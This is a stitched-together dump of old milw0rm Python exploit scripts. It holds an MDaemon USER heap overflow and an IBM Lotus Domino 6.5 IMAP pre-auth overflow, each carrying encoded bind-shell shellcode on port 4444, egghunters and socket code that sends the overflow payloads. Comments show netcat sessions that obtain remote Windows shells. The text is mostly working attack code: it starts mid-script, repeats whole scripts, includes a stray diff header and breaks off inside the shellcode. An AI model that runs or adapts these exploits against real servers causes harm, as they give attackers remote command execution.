ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)
# milw0rm.com [2006-08-26]
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
########################################################################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)
# milw0rm.com [2006-08-26]


@ -1,145 +1,145 @@
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:\Lotus\Domino>
import sys
import md5
import struct
import base64
import socket
def sendbind(target):
bindshell ="\x90"* 400 # Metasploit bind shell port 4444
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
bind = 'a001 admin ' + bindshell +'\r\n'
print "[*] Sending bindshell *somewhere* into memory"
sock.send(bind)
response = sock.recv(1024)
sock.close()
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a001 authenticate cram-md5\r\n'
sock.send(auth)
response = sock.recv(1024)
print response
m = md5.new()
m.update(response[2:0])
digest = m.digest()
payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
# 0x774b4c6a CALL [EAX +4]
payload += "jLKw"
payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
login = payload + ' ' + digest
login = base64.encodestring(login) + '\r\n'
print "[*] Triggering overwrite, ph33r."
sock.send(login)
sock.close()
print "[*] You may need to wait up to 2 minutes"
print "[*] for egghunter to find da shell."
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
print '[*] Usage: %s <imap server>\n' % sys.argv[0]
sys.exit(-1)
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
sendbind(target)
sendbind(target)
sendbind(target)
sendbind(target)
ExploitLotus(target)
# milw0rm.com [2007-03-31]
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:\Lotus\Domino>
import sys
import md5
import struct
import base64
import socket
def sendbind(target):
bindshell ="\x90"* 400 # Metasploit bind shell port 4444
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
